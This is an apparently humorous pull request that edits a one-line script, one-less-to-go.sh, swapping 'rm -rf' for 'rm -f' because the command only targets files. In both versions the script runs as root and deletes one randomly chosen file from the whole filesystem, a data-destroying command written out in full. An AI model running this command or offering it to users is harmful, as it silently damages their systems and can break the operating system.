### PR TITLE
If it's -type f, then rm doesn't need the -r flag

### DIFF
--- a/static/one-less-to-go.sh
+++ b/static/one-less-to-go.sh
@@ -1,1 +1,1 @@
-sudo rm -rf $(sudo find / -type f | shuf -n1)
+sudo rm -f $(sudo find / -type f | shuf -n1)


### PR DESCRIPTION
:^)